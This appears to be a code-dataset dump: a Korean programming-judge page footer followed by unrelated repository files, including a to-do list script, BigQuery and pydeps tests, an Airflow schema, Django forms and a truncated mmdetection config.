href="/category/420">구데기컵</a></li><li><a href="/category/358">꼬마컵</a></li><li><a href="/category/421">네블컵</a></li><li><a href="/category/413">소프트콘</a></li><li><a href="/category/416">웰노운컵</a></li><li><a href="/category/detail/1743">HYEA Cup</a></li><li><a href="/category/364">경기과학고등학교</a></li><li><a href="/category/417">대구과학고등학교</a></li><li><a href="/category/429">부산일과학고</a></li><li><a href="/category/435">서울과학고등학교</a></li><li><a href="/category/394">선린인터넷고등학교</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div class="thumb-headline"><h2>출처</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/category/1">ICPC</a></li><li><a href="/category/211">ICPC Korea Regional</a></li><li><a href="/category/2">Olympiad</a></li><li><a href="/category/55">한국정보올림피아드</a></li><li><a href="/category/57">한국정보올림피아드시․도지역본선</a></li><li><a href="/category/318">전국 대학생 프로그래밍 대회 동아리 연합</a></li><li><a href="/category/5">대학교 대회</a></li><li><a href="/category/428">카카오 코드 페스티벌</a></li><li><a href="/category/215">Coder's High</a></li></ul><div class="thumb-headline"><h2>대학교 대회</h2></div><ul class="list-inline simple-list"><li><a href="/category/320">KAIST</a></li><li><a href="/category/426">POSTECH</a></li><li><a href="/category/341">고려대학교</a></li><li><a href="/category/434">광주과학기술원</a></li><li><a href="/category/361">국민대학교</a></li><li><a href="/category/83">서강대학교</a></li><li><a href="/category/354">서울대학교</a></li><li><a href="/category/352">숭실대학교</a></li><li><a href="/category/408">아주대학교</a></li><li><a href="/category/334">연세대학교</a></li><li><a href="/category/336">인하대학교</a></li><li><a href="/category/347">전북대학교</a></li><li><a href="/category/400">중앙대학교</a></li><li><a href="/category/402">충남대학교</a></li><li><a href="/category/418">한양대 ERICA</a></li><li><a href="/category/363">홍익대학교</a></li><li><a href="/category/409">경인지역 6개대학 연합 프로그래밍 경시대회</a></li></ul></div><div class="col-sm-3 md-margin-bottom-40"><div 
class="thumb-headline"><h2>도움말</h2></div><ul class="list-unstyled simple-list margin-bottom-10"><li><a href="/help/judge">채점 도움말 및 채점 환경</a></li><li><a href="/help/rejudge">재채점 안내</a></li><li><a href="/help/rte">런타임 에러 도움말</a></li><li><a href="/help/problem">문제 스타일 안내</a></li><li><a href="/help/language">컴파일 또는 실행 옵션, 컴파일러 버전, 언어 도움말</a></li><li><a href="/help/workbook">문제집 도움말</a></li><li><a href="/help/contest">대회 개최 안내</a></li><li><a href="/help/problem-add">문제 출제 안내</a></li><li><a href="/help/rule">이용 규칙</a></li><li><a href="/help/stat">통계 도움말</a></li><li><a href="/help/question">질문 도움말</a></li><li><a href="/help/faq">자주묻는 질문</a></li><li><a href="/help/lecture">강의 안내</a></li><li><a href="/help/short">짧은 주소 안내</a></li><li><a href="/help/ad">광고 안내</a></li></ul></div></div></div><div class="copyright"><div class="container"><div class="row"><div class="col-md-9 col-sm-12"><p>© 2021 All Rights Reserved. <a href="https://startlink.io">주식회사 스타트링크</a> | <a href="/terms">서비스 약관</a> | <a href="/privacy">개인정보 보호</a> | <a href="/terms/payment">결제 이용 약관</a> | <a href="https://boj.startlink.help/hc/ko">도움말</a> | <a href="http://startl.ink/2pmlJaY">광고 문의</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj.md">업데이트 노트</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj-issues.md">이슈</a> | <a href="https://github.com/Startlink/update-note/blob/master/boj-todo.md">TODO</a></p></div><div class="col-md-3 col-sm-12"><ul class="social-icons pull-right"><li><a href="https://www.facebook.com/onlinejudge" data-original-title="Facebook" class="rounded-x social_facebook"></a></li><li><a href="https://startlink.blog" data-original-title="Wordpress" class="rounded-x social_wordpress"></a></li></ul></div></div><div class="row"><div class="col-sm-12"><a href="https://startlink.io" class="hidden-xs"><img src="https://d2gd6pc034wcta.cloudfront.net/logo/startlink-logo-white-only.png" class="pull-right startlink-logo"></a><ul class="list-unstyled simple-list"><li>사업자 등록 번호: 541-88-00682</li><li>대표자명: 최백준</li><li>주소: 서울시 서초구 서초대로74길 29 서초파라곤 412호</li><li>전화번호: 02-521-0487 (이메일로 연락 주세요)</li><li>이메일: <a href="mailto:[email protected]">[email protected]</a></li><li>통신판매신고번호: 제 2017-서울서초-2193 호</li></ul></div><div class="col-xs-9"><p id="no-acm-icpc"></p></div><div class="col-xs-3"></div></div></div></div></div>
</div>
<div id="fb-root"></div><script>
window.fbAsyncInit = function() {
FB.init({
appId : '322026491226049',
cookie : true,
xfbml : true,
version : 'v2.8'
});
};
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/ko_KR/sdk.js";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
</script>
<script>
!function(f,b,e,v,n,t,s){ if(f.fbq)return;n=f.fbq=function(){ n.callMethod?
n.callMethod.apply(n,arguments):n.queue.push(arguments) };if(!f._fbq)f._fbq=n;
n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s) }(window,
document,'script','//connect.facebook.net/en_US/fbevents.js');
fbq('init', '1670563073163149');
fbq('track', 'PageView');
</script>
<noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1670563073163149&ev=PageView&noscript=1"/></noscript><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/3.0.1/jquery-migrate.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.2.0/js/bootstrap.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/moment.min.js"></script><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.21.0/locale/ko.js"></script><script type="text/javascript" src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/app.min.js?version=20210107"></script><script type="text/javascript">jQuery(document).ready(function() {App.init(0);});</script><!--[if lt IE 9]><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/respond.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/plugins/html5shiv.js"></script><script src="https://ddo7jzca0m2vt.cloudfront.net/unify/js/plugins/placeholder-IE-fixes.js"></script><![endif]--><script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/pace/1.0.2/pace.min.js"></script><script src="https://js.pusher.com/4.2/pusher.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/noty/3.1.4/noty.min.js"></script>
<script>
window.MathJax = {
tex: {
inlineMath: [ ['$', '$'], ['\\(', '\\)'] ],
displayMath: [ ['$$','$$'], ["\\[","\\]"] ],
processEscapes: true,
tags: "ams",
autoload: {
color: [],
colorv2: ['color']
},
packages: { '[+]': ['noerrors'] }
},
options: {
ignoreHtmlClass: "no-mathjax|redactor-editor",
processHtmlClass: 'mathjax',
enableMenu: false
},
chtml: {
scale: 0.9
},
loader: {
load: ['input/tex', 'output/chtml', '[tex]/noerrors'],
}
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script><script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
</body>
</html> | [
"[email protected]"
] | |
4d4d91dbf71adc295e441bc7d03a0ec941967878 | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_8965.py | 60985953452cc8e3a19e764e0aa2103646d7d4f7 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | # Use python to run shell script with Popen behaves differently in python command line and actual program
from subprocess import Popen, PIPE
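# A minimal sketch (not part of the original snippet): pass the command as an
# argument list and collect output with communicate(), which behaves the same
# in the interactive interpreter and in a script. The script name
# "myscript.sh" is an assumed placeholder.
proc = Popen(["bash", "myscript.sh"], stdout=PIPE, stderr=PIPE)
out, err = proc.communicate()  # wait for exit and read both streams fully
print(out)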
| [
"[email protected]"
] | |
a5e60e51f46f0f4c1de4519f9e3ed6e437e72ee2 | 0862943574c7cbf98f7d049a516e8caf204304d1 | /todo_list.py | 3802e8c3b0c13da8abc8fac0eeef687f9a4748c8 | [] | no_license | MsMunda/Fun | 4a29a4d70e8f46e8d94c385831a7a49135566104 | 6d22207b75a59cb53d1d2e85549472571feeb1c5 | refs/heads/master | 2021-01-20T03:23:27.051210 | 2017-04-27T01:08:24 | 2017-04-27T01:08:24 | 89,535,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,109 | py | """This is a Terminal-based program that allows a user to create and edit a to-do list.
The stub of each function has been provided. Read the docstrings for what each
function should do and complete the body of the functions below.
You can run the script in your Terminal at any time using the command:
>>> python todo_list.py
"""
def add_to_list(my_list):
    """Takes user input and adds it as a new item to the end of the list."""
    item = raw_input("What would you like to add? >>> ")
    my_list.append(item)
def view_list(my_list):
    """Print each item in the list."""
    for item in my_list:
        print item
def display_main_menu(my_list):
"""Displays main options, takes in user input, and calls view or add function."""
user_options = """
\nWould you like to:
A. Add a new item
B. View list
C. Quit the program
>>> """
while True:
user_input = raw_input(user_options)
        if user_input == 'A':
            add_to_list(my_list)
        elif user_input == 'B':
            view_list(my_list)
        elif user_input == 'C':
            break
        else:
            print "Please choose A, B, or C."
#-------------------------------------------------
my_list = []
display_main_menu(my_list)
| [
"[email protected]"
] | |
848cf25049faf52b0f930681494b0600a719b9da | 4a3bf95187335a8d46139b1d7a67586e96eb387f | /venv/Scripts/easy_install-script.py | 7527f9f055f57237c2921b4ee8431cf9d8aefd47 | [] | no_license | ares5221/python-Learning | 6f786b9edf081010cd6f2ad684f505d30da8d4a8 | 4ae77239e2b91bb84b306930af88b5035b897963 | refs/heads/master | 2021-06-04T03:00:17.338022 | 2020-04-13T08:14:06 | 2020-04-13T08:14:06 | 134,068,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!G:\pythonLearningWorkSpace\python-Learning\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
a9c3e5697018a920d3e2f4f5430092dd2011706e | ec00584ab288267a7cf46c5cd4f76bbec1c70a6b | /offline/__Digital_Twin/__release2/__release2_sprint4/15619 - Link the asset locations to local weather/dev/dev.py | 585898cda425bdfd488487cf9f2d129e386b1a2e | [] | no_license | rahuldbhadange/Python | b4cc806ff23953389c9507f43d817b3815260e19 | 7e162117f1acc12537c7eeb36d6983d804122ff3 | refs/heads/master | 2021-06-23T05:04:20.053777 | 2020-01-28T10:34:28 | 2020-01-28T10:34:28 | 217,307,612 | 0 | 0 | null | 2021-06-10T22:44:11 | 2019-10-24T13:35:42 | Python | UTF-8 | Python | false | false | 2,116 | py |
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Iotic Labs Ltd. All rights reserved.
from __future__ import unicode_literals, print_function
from json import dumps
import logging
logging.basicConfig(format='%(asctime)s %(levelname)s [%(name)s] {%(threadName)s} %(message)s', level=logging.WARNING)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
from IoticAgent.Core.compat import monotonic
from IoticAgent.ThingRunner import RetryingThingRunner
def pretty_print(msg, data):
print(msg, dumps(data, indent=4))
class TemplateTR(RetryingThingRunner):
LOOP_TIMER = 10 # minimum number of seconds duration of the main loop
def __init__(self, config=None):
"""Instantiation code in here, after the call to super().__init__()
"""
super(TemplateTR, self).__init__(config=config)
def on_startup(self):
"""Called once at the beginning, before main().
Use this method to create your things, rebind connections, setup hardware, etc.
"""
results = self.client.search(text="weather", location={'lat': 52.427809, 'long': -0.327829, 'radius': 10.789}, limit=1)
pretty_print("results", results)
for thing_guid, thing_data in results.items():
pretty_print("thing_guid", thing_guid)
pretty_print("thing_data", thing_data)
for point_guid, point_data in thing_data['points'].items():
pretty_print("point_guid", point_guid)
pretty_print("point_data", point_data)
descr = self.client.describe(point_guid)
pretty_print("descr", descr)
def main(self):
"""Called after on_startup.
Use this method for your main loop (if you need one).
Set LOOP_TIMER for your regular tick
"""
while True:
start = monotonic()
# loop code in here
stop = monotonic()
if self.wait_for_shutdown(max(0, self.LOOP_TIMER - (stop - start))):
break
def main():
TemplateTR(config="test.ini").run()
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
9b42299d9d109563fa71c7a5fed85b1ebd999120 | 36907c0840b34687026b3439a06c49e5c0d2ef11 | /tests/test_file.py | 752908478767a7efc177298baf3fad6d612dd537 | [
"BSD-2-Clause"
] | permissive | melscoop/pydeps | f5585adde69dfc2afd82254260a5dd4750cf57f2 | c6078821222b314e2befbc6723a36967a9b5a47b | refs/heads/master | 2023-08-29T00:19:55.845364 | 2021-10-14T06:07:02 | 2021-10-14T06:07:02 | 423,976,408 | 1 | 0 | BSD-2-Clause | 2021-11-02T19:51:10 | 2021-11-02T19:39:42 | null | UTF-8 | Python | false | false | 713 | py | # -*- coding: utf-8 -*-
import os
from tests.filemaker import create_files
from tests.simpledeps import simpledeps
def test_file():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert simpledeps('a.py') == set()
def test_file_pylib():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert 'collections -> a' in simpledeps('a.py', '--pylib')
def test_file_pyliball():
files = """
a.py: |
import collections
"""
with create_files(files) as workdir:
assert 'collections -> a' in simpledeps('a.py', '--pylib --pylib-all')
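def test_file_local_import():
    # A sketch of one more case (an assumption, not in the original suite):
    # a dependency on a local module, which pydeps reports without --pylib.
    files = """
        a.py: |
            import b
        b.py: |
            pass
    """
    with create_files(files) as workdir:
        assert 'b -> a' in simpledeps('a.py')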
| [
"[email protected]"
] | |
105b3a2100dc54523233be6553a7d540acbaf799 | b8fb2620257b6286871211b7bde1cd8a0a5468db | /ts_feature_extractor.py | c86913b859b6d8d349b58a479f536fd14205f9ff | [] | no_license | mehdidc/elnino | f9aac0c586317d261151265cbd0290ae351731b8 | 7b85ad180634f1db4a61654d1475f54c60b694a4 | refs/heads/master | 2021-01-10T07:34:57.507222 | 2015-06-04T07:15:35 | 2015-06-04T07:15:35 | 36,854,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | import numpy as np
en_lat_bottom = -5
en_lat_top = 5
en_lon_left = 360-170
en_lon_right = 360-120
def get_enso_mean(tas):
"""The array of mean temperatures in the El Nino 3.4 region at all time points."""
return tas.loc[:, en_lat_bottom:en_lat_top, en_lon_left:en_lon_right].mean(dim=('lat','lon'))
class FeatureExtractor(object):
def __init__(self):
pass
def transform(self, temperatures_xray, n_burn_in, n_lookahead, skf_is):
"""Combine two variables: the montly means corresponding to the month of the target and
the current mean temperature in the El Nino 3.4 region."""
# This is the range for which features should be provided. Strip
# the burn-in from the beginning and the prediction look-ahead from
# the end.
valid_range = range(n_burn_in, temperatures_xray['time'].shape[0] - n_lookahead)
enso = get_enso_mean(temperatures_xray['tas'])
# reshape the vector into a table years as rows, months as columns
enso_matrix = enso.values.reshape((-1,12))
count_matrix = np.ones(enso_matrix.shape)
# compute cumulative means of columns (remember that you can only use
# the past at each time point) and reshape it into a vector
enso_monthly_mean = (enso_matrix.cumsum(axis=0) / count_matrix.cumsum(axis=0)).ravel()
# roll it backwards (6 months) so it corresponds to the month of the target
enso_monthly_mean_rolled = np.roll(enso_monthly_mean, n_lookahead - 12)
# select valid range
enso_monthly_mean_valid = enso_monthly_mean_rolled[valid_range]
enso_valid = enso.values[valid_range]
X = np.array([enso_valid, enso_monthly_mean_valid]).T
return X
| [
"[email protected]"
] | |
d5d85c91e7b3eb67b2067d90181727ba54def11a | 3db7b5409f2f9c57ab3f98bda50f8b548d98063d | /tests/system/test_list_rows.py | 4c08958c37ac71ea16fd4a02c8b4507fedecac2b | [
"Apache-2.0"
] | permissive | googleapis/python-bigquery | 66db156b52e97565f6211b2fab5aac4e519fa798 | 3645e32aeebefe9d5a4bc71a6513942741f0f196 | refs/heads/main | 2023-09-01T07:41:24.893598 | 2023-08-23T19:04:13 | 2023-08-23T19:04:13 | 226,992,475 | 622 | 287 | Apache-2.0 | 2023-09-12T04:31:26 | 2019-12-10T00:09:04 | Python | UTF-8 | Python | false | false | 4,455 | py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import decimal
from dateutil import relativedelta
from google.cloud import bigquery
from google.cloud.bigquery import enums
def test_list_rows_empty_table(bigquery_client: bigquery.Client, table_id: str):
from google.cloud.bigquery.table import RowIterator
table = bigquery_client.create_table(table_id)
# It's a bit silly to list rows for an empty table, but this does
# happen as the result of a DDL query from an IPython magic command.
rows = bigquery_client.list_rows(table)
assert isinstance(rows, RowIterator)
assert tuple(rows) == ()
def test_list_rows_page_size(bigquery_client: bigquery.Client, table_id: str):
num_items = 7
page_size = 3
num_pages, num_last_page = divmod(num_items, page_size)
to_insert = [{"string_col": "item%d" % i, "rowindex": i} for i in range(num_items)]
bigquery_client.load_table_from_json(to_insert, table_id).result()
df = bigquery_client.list_rows(
table_id,
selected_fields=[bigquery.SchemaField("string_col", enums.SqlTypeNames.STRING)],
page_size=page_size,
)
pages = df.pages
for i in range(num_pages):
page = next(pages)
assert page.num_items == page_size
page = next(pages)
assert page.num_items == num_last_page
def test_list_rows_scalars(bigquery_client: bigquery.Client, scalars_table: str):
rows = sorted(
bigquery_client.list_rows(scalars_table), key=lambda row: row["rowindex"]
)
row = rows[0]
assert row["bool_col"] # True
assert row["bytes_col"] == b"Hello, World!"
assert row["date_col"] == datetime.date(2021, 7, 21)
assert row["datetime_col"] == datetime.datetime(2021, 7, 21, 11, 39, 45)
assert row["geography_col"] == "POINT(-122.0838511 37.3860517)"
assert row["int64_col"] == 123456789
assert row["interval_col"] == relativedelta.relativedelta(
years=7, months=11, days=9, hours=4, minutes=15, seconds=37, microseconds=123456
)
assert row["numeric_col"] == decimal.Decimal("1.23456789")
assert row["bignumeric_col"] == decimal.Decimal("10.111213141516171819")
assert row["float64_col"] == 1.25
assert row["string_col"] == "Hello, World!"
assert row["time_col"] == datetime.time(11, 41, 43, 76160)
assert row["timestamp_col"] == datetime.datetime(
2021, 7, 21, 17, 43, 43, 945289, tzinfo=datetime.timezone.utc
)
nullrow = rows[1]
for column, value in nullrow.items():
if column == "rowindex":
assert value == 1
else:
assert value is None
def test_list_rows_scalars_extreme(
bigquery_client: bigquery.Client, scalars_extreme_table: str
):
rows = sorted(
bigquery_client.list_rows(scalars_extreme_table),
key=lambda row: row["rowindex"],
)
row = rows[0]
assert row["bool_col"] # True
assert row["bytes_col"] == b"\r\n"
assert row["date_col"] == datetime.date(9999, 12, 31)
assert row["datetime_col"] == datetime.datetime(9999, 12, 31, 23, 59, 59, 999999)
assert row["geography_col"] == "POINT(-135 90)"
assert row["int64_col"] == 9223372036854775807
assert row["interval_col"] == relativedelta.relativedelta(
years=-10000, days=-3660000, hours=-87840000
)
assert row["numeric_col"] == decimal.Decimal(f"9.{'9' * 37}E+28")
assert row["bignumeric_col"] == decimal.Decimal(f"9.{'9' * 75}E+37")
assert row["float64_col"] == float("Inf")
assert row["string_col"] == "Hello, World"
assert row["time_col"] == datetime.time(23, 59, 59, 999999)
assert row["timestamp_col"] == datetime.datetime(
9999, 12, 31, 23, 59, 59, 999999, tzinfo=datetime.timezone.utc
)
nullrow = rows[4]
for column, value in nullrow.items():
if column == "rowindex":
assert value == 4
else:
assert value is None
| [
"[email protected]"
] | |
61d4759ecc91732720a3b6343a276d796bea8fd6 | 6aa7e203f278b9d1fd01244e740d5c944cc7c3d3 | /airflow/api_connexion/schemas/event_log_schema.py | 0753a8a104a44ec8b1a0d3b8965e9cd0eee383b3 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"Python-2.0"
] | permissive | laserpedro/airflow | 83fc991d91749550b151c81876d9e7864bff3946 | a28afa8172489e41ecf7c381674a0cb91de850ff | refs/heads/master | 2023-01-02T04:55:34.030935 | 2020-10-24T15:55:11 | 2020-10-24T15:55:11 | 285,867,990 | 1 | 0 | Apache-2.0 | 2020-08-07T15:56:49 | 2020-08-07T15:56:49 | null | UTF-8 | Python | false | false | 1,861 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from typing import List, NamedTuple
from marshmallow import Schema, fields
from marshmallow_sqlalchemy import SQLAlchemySchema, auto_field
from airflow.models.log import Log
class EventLogSchema(SQLAlchemySchema):
""" Event log schema """
class Meta:
""" Meta """
model = Log
id = auto_field(data_key='event_log_id', dump_only=True)
dttm = auto_field(data_key='when', dump_only=True)
dag_id = auto_field(dump_only=True)
task_id = auto_field(dump_only=True)
event = auto_field(dump_only=True)
execution_date = auto_field(dump_only=True)
owner = auto_field(dump_only=True)
extra = auto_field(dump_only=True)
class EventLogCollection(NamedTuple):
""" List of import errors with metadata """
event_logs: List[Log]
total_entries: int
class EventLogCollectionSchema(Schema):
""" EventLog Collection Schema """
event_logs = fields.List(fields.Nested(EventLogSchema))
total_entries = fields.Int()
event_log_schema = EventLogSchema()
event_log_collection_schema = EventLogCollectionSchema()
| [
"[email protected]"
] | |
5c25a940343aea2972f36ee9b25e6e5a5019f0f5 | 9e567b8241ce00e9d53843f5aba11c4a119b079f | /tags/v0_61_0/htdocs/tut/silly_axes.py | acdd1abf85c5ec85aa02e9070be482fceec67f1b | [
"Python-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | neilpanchal/matplotlib | 3d2a7133e858c4eefbb6c2939eb3f7a328b18118 | 7565d1f2943e0e7b4a3f11ce692dfb9b548d0b83 | refs/heads/master | 2020-06-11T09:20:43.941323 | 2011-01-21T21:50:16 | 2011-01-21T21:50:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | from matplotlib.matlab import *
t = arange(0, 2.1, 0.1)
rc('grid', color=0.75, linewidth=1.5)
rc('tick', color='b', labelsize=14)
a = subplot(111)
plot(t, t**2, '-')
title('Custom axes using rc')
grid(True)
savefig('custom_axes')
show()
| [
"(no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed"
] | (no author)@f61c4167-ca0d-0410-bb4a-bb21726e55ed |
e3c9eebf31eb84021294e0f466f8819622e71363 | 7b65481a7183f56a8b4ba2bce08cd1131cebe0e6 | /infinitelooper.py | 0365155016e44f11023400bc8ece254156932bd4 | [] | no_license | guadalupeaceves-lpsr/class-samples | 17e261084de2e64ceae6daaaac5a53618eeafb37 | bc5c096453243ef76ca6854d54232ea234ba24b5 | refs/heads/master | 2021-01-21T04:48:01.443832 | 2016-06-13T03:50:15 | 2016-06-13T03:50:15 | 48,007,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | print("What's your favorite number?")
num = int(raw_input())
while num != 14:
print("Nope, I don't like it. Choose another.")
num = int(raw_input())
| [
"lps@lps-1011PX.(none)"
] | lps@lps-1011PX.(none) |
63366e5426c932f5970b06f1ed4796f94c709e38 | 3fd9c7ee49a32eae3013191b63154a9a5d6dafe6 | /12.6驾驶飞船/12.6.3左右移动/ship_3.py | 29b66748188b9598c3cd9ceb7bfaba5932bbc169 | [] | no_license | taozhenting/alien_invasion | e0c03cd9797cb33e40ca47a13eadeda8b1c4cf85 | fd9bd97d6238da702fbb1eb6fcb78e8352875fe2 | refs/heads/master | 2020-04-27T05:31:48.862784 | 2019-01-30T09:43:49 | 2019-01-30T09:43:50 | 174,083,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | #Add movement to the left
import pygame
class Ship():
    #the screen argument specifies where the ship is drawn
    def __init__(self,screen):
        """Initialize the ship and set its starting position"""
        self.screen = screen
        #Load the ship image and get its bounding rectangle
        #pygame.image.load() returns a surface representing the ship, which is stored in self.image
        self.image = pygame.image.load('images/ship.bmp')
        #rect treats objects as rectangles even when their shapes are not rectangular. Use get_rect() to get the rect attribute of the surface
        self.rect = self.image.get_rect()
        #Store the rectangle representing the screen in self.screen_rect
        self.screen_rect = screen.get_rect()
        #Place each new ship at the bottom center of the screen
        #Set self.rect.centerx (the x coordinate of the ship's center) to the centerx attribute of the screen rectangle
        self.rect.centerx = self.screen_rect.centerx
        #Set self.rect.bottom (the y coordinate of the ship's bottom edge) to the bottom attribute of the screen rectangle
        self.rect.bottom = self.screen_rect.bottom
        #Movement flags, with leftward movement added
        self.moving_right = False
        self.moving_left = False
    def update(self):
        """Adjust the ship's position according to the movement flags"""
        if self.moving_right:
            self.rect.centerx += 1
        #Use if rather than elif: if both arrow keys are pressed at once, self.rect.centerx is first increased and then decreased
        #With elif, the right arrow key would always take priority
        if self.moving_left:
            self.rect.centerx -= 1
    #Define the blitme() method, which draws the image to the screen at the position given by self.rect
    def blitme(self):
        """Draw the ship at the specified position"""
        self.screen.blit(self.image,self.rect)
"[email protected]"
] | |
0640154e6d006f7e8cd5a8a84feb4397adea1e62 | 3dbb38734200935f143ea8b6446e9bf32a4a16ee | /PyClient/TableOfLife/app/forms.py | 2f670b63694db308562266cdc27f51cebb639723 | [] | no_license | k-t-l-h/TableOfLife | 4624938a2edff3b5de336c30fec5775a5e3971cf | f0ceefe499b9a5a76b9f15201cbd409fa75f0605 | refs/heads/main | 2023-05-14T09:39:37.406622 | 2021-06-03T19:35:43 | 2021-06-03T19:35:43 | 345,408,827 | 0 | 2 | null | 2023-02-17T18:58:24 | 2021-03-07T17:26:42 | C++ | UTF-8 | Python | false | false | 1,125 | py | from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.contrib.auth.models import User
from django.core import validators
from django import forms
import re
class AskForm(forms.Form):
    classes = forms.CharField(label='About the subjects:', widget=forms.Textarea(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Subject name, Teacher name, Number of students'}))
    students = forms.CharField(label='Selection of students:', widget=forms.Textarea(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'Grade matrix'}))
    settings = forms.CharField(label='Settings (advanced users only): crossover, mutation, selector, creator', widget=forms.TextInput(
        attrs={'class': 'form-control', 'placeholder': 'Separate values with commas'}))
class PostForm(forms.Form):
    uuid = forms.CharField(label='Your UUID:', widget=forms.TextInput(
        attrs={'class': 'form-control', 'rows': 5, 'placeholder': 'UUID'}))
| [
"[email protected]"
] | |
4b019b306236babfdf442ed4b7f1e6d0ebb21614 | ae8a89e90b4d69a061076563ba68272d27e5c664 | /HIDS/main.py | a75779d5ec65158a8c28c296ca08fbb8d7b57269 | [] | no_license | Louis-Saglio/python_script | 8d1a65f704c21eb3b2fee17e63b8d2b467764bb0 | f039e61078f5eb18d3334c4940d794fa5bc5f67d | refs/heads/master | 2022-12-21T21:37:07.234976 | 2017-10-29T15:52:47 | 2017-10-29T15:52:47 | 106,963,199 | 0 | 1 | null | 2022-12-09T03:22:11 | 2017-10-14T21:11:03 | Python | UTF-8 | Python | false | false | 255 | py | import filecmp
import os
def rlistdir(path='.'):
    """Recursively yield the path of every file under the given directory."""
    for directory, sub_dirs, files in os.walk(path):
        for file in files:
            yield os.path.join(directory, file)
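# A minimal integrity-check sketch showing one way the otherwise-unused
# filecmp import could serve a host-based IDS; the baseline-directory idea is
# an assumption, not part of the original script.
def changed_files(path, baseline):
    """Yield files under path that differ from, or are missing in, a baseline copy."""
    for file in rlistdir(path):
        counterpart = os.path.join(baseline, os.path.relpath(file, path))
        if not os.path.exists(counterpart) or not filecmp.cmp(file, counterpart, shallow=False):
            yield file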
if __name__ == '__main__':
for i in rlistdir('/usr'):
print(i)
| [
"[email protected]"
] | |
bcfaee049701f0696da3a47ef641b699bbe4b7cd | c5f58af61e3577ded52acda210f4f664651b598c | /template/mmdetection/configs/foveabox/fovea_r50_fpn_4x4_1x_coco.py | 2b00ad2faf61e2c437b5237d9de02049a81edf57 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hojihun5516/object-detection-level2-cv-02 | 0a4ee5cea9a77ef5d43fb61a4b37fe3a87cb0eac | bc8a08286935b31b8e7e597c4b1ca2cbbaeb9109 | refs/heads/master | 2023-08-31T09:50:59.150971 | 2021-10-16T15:00:19 | 2021-10-16T15:00:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,528 | py | _base_ = ["../_base_/datasets/coco_detection.py", "../_base_/schedules/schedule_1x.py", "../_base_/default_runtime.py"]
# model settings
model = dict(
